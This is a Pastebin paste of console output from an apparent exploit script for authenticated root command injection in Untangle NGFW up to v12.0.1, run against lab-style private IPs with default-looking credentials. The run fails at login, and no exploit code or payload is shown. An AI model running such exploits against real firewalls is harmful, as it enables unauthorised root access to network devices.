API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 7th, 2016
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.11 KB | None | 0 0
raw download clone embed print report
  1. python 40030.py 192.168.242.151 192.168.242.130 root admin
  2.  
  3. Untangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit
  4. by @3xocyte
  5.  
  6. [*] Opening session...
  7. [*] Authenticating...
  8. Logging in...
  9. login: <Response [200]>
  10. login.text: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  11.  
  12. <html xmlns="http://www.w3.org/1999/xhtml">
  13. <head>
  14. <title>Untangle Administrator Login</title>
  15. <script type="text/javascript">if (top.location!=location) top.location.href=document.location.href;</script>
  16. <style type="text/css">
  17. /* <![CDATA[ */
  18. @import url(/images/base.css);
  19. /* ]]> */
  20. </style>
  21. </head>
  22. <body class="loginPage">
  23. <div id="main" style="width: 500px; margin: 50px auto 0 auto;">
  24. <form method="post" action="/auth/login?url=/webui&amp;realm=Administrator" class="form-signin">
  25. <center>
  26. <img style="margin-bottom:10px;" src="/images/BrandingLogo.png"><br/>
  27. <span class="form-signin-heading"><strong>Untangle Administrator Login</strong></span>
  28. <br/>
  29. <div class="banner"></div>
  30. <br/>
  31. <span><strong><b style="color:#f00">Error: Username and Password do not match</b><br/><br/></strong></span>
  32. <table>
  33. <tbody>
  34. <tr><td style="text-align:right;color:white;">Server:</td><td><em><font color="white">&nbsp;192.168.242.151</font></em></td></tr>
  35. <tr><td style="text-align:right;color:white;">Username:</td><td><input id="username" type="text" name="username" value="admin" class="input-block-level"/></td></tr>
  36. <tr><td style="text-align:right;color:white;">Password:</td><td><input id="password" type="password" name="password" class="input-block-level"/></td></tr>
  37. </tbody>
  38. </table>
  39. <br/>
  40. <div style="text-align: center;color:white;"><button value="login" type="submit">Login</button></div>
  41. </center>
  42. </form>
  43. <script type="text/javascript">document.getElementById('password').focus();</script>
  44. </div>
  45. </body>
  46. </html>
  47. Posting to RPC URL...
  48. req_nonce: <Response [200]>
  49. req_nonce.text: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  50.  
  51. <html xmlns="http://www.w3.org/1999/xhtml">
  52. <head>
  53. <title>Untangle Administrator Login</title>
  54. <script type="text/javascript">if (top.location!=location) top.location.href=document.location.href;</script>
  55. <style type="text/css">
  56. /* <![CDATA[ */
  57. @import url(/images/base.css);
  58. /* ]]> */
  59. </style>
  60. </head>
  61. <body class="loginPage">
  62. <div id="main" style="width: 500px; margin: 50px auto 0 auto;">
  63. <form method="post" action="/auth/login?url=/webui/JSON-RPC&amp;realm=Administrator" class="form-signin">
  64. <center>
  65. <img style="margin-bottom:10px;" src="/images/BrandingLogo.png"><br/>
  66. <span class="form-signin-heading"><strong>Untangle Administrator Login</strong></span>
  67. <br/>
  68. <div class="banner"></div>
  69. <br/>
  70. <span><strong></strong></span>
  71. <table>
  72. <tbody>
  73. <tr><td style="text-align:right;color:white;">Server:</td><td><em><font color="white">&nbsp;192.168.242.151</font></em></td></tr>
  74. <tr><td style="text-align:right;color:white;">Username:</td><td><input id="username" type="text" name="username" value="admin" class="input-block-level"/></td></tr>
  75. <tr><td style="text-align:right;color:white;">Password:</td><td><input id="password" type="password" name="password" class="input-block-level"/></td></tr>
  76. </tbody>
  77. </table>
  78. <br/>
  79. <div style="text-align: center;color:white;"><button value="login" type="submit">Login</button></div>
  80. </center>
  81. </form>
  82. <script type="text/javascript">document.getElementById('password').focus();</script>
  83. </div>
  84. </body>
  85. </html>
  86. Parsing JSON response...
  87. No JSON object could be decoded
  88. [!] Authentication failed. Quitting.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!